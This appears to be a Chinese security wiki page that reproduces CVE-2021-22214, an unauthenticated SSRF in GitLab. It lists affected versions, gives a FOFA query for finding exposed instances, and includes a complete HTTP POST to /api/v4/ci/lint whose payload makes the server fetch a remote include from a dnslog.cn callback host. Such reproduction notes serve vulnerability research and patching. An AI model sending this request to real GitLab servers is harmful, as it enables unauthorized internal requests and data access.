menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right ... chevron_right GitLab chevron_right GitLab SSRF漏洞 CVE-2021-22214.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    GitLab SSRF漏洞 CVE-2021-22214.md
    1.74 KB / 2021-07-04 06:01:08
        # GitLab SSRF漏洞 CVE-2021-22214
    
    ## 漏洞描述
    
    GitLab存在前台未授权SSRF漏洞,未授权的攻击者也可以利用该漏洞执行SSRF攻击(CVE-2021-22214)。该漏洞源于对用户提供数据的验证不足,远程攻击者可通过发送特殊构造的 HTTP 请求,欺骗应用程序向任意系统发起请求。攻击者成功利用该漏洞可获得敏感数据的访问权限或向其他服务器发送恶意请求。
    
    ## 漏洞影响
    
    > [!NOTE]
    >
    > Gitlab > 10.5 
    
    ## FOFA
    
    > [!NOTE]
    >
    > app="GitLab"
    
    ## 环境搭建
    
    http://vulfocus.fofa.so/
    
    ![image-20210627220351605](http://wikioss.peiqi.tech/vuln/image-20210627220351605.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    ## 漏洞复现
    
    登录页面如下
    
    ![image-20210627220651158](http://wikioss.peiqi.tech/vuln/image-20210627220651158.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    发送请求包
    
    ```
    POST /api/v4/ci/lint HTTP/1.1
    Host: 
    User-Agent: python-requests/2.25.0
    Accept-Encoding: gzip, deflate
    Accept: */*
    Connection: keep-alive
    Content-Type: application/json
    Content-Length: 111
    
    {"include_merged_yaml": true, "content": "include:\n  remote: http://965qaw.dnslog.cn/api/v1/targets?test.yml"}
    ```
    
    ![image-20210627220854023](http://wikioss.peiqi.tech/vuln/image-20210627220854023.png?x-oss-process=image/auto-orient,1/quality,q_90/watermark,image_c2h1aXlpbi9zdWkucG5nP3gtb3NzLXByb2Nlc3M9aW1hZ2UvcmVzaXplLFBfMTQvYnJpZ2h0LC0zOS9jb250cmFzdCwtNjQ,g_se,t_17,x_1,y_10)
    
    links
    file_download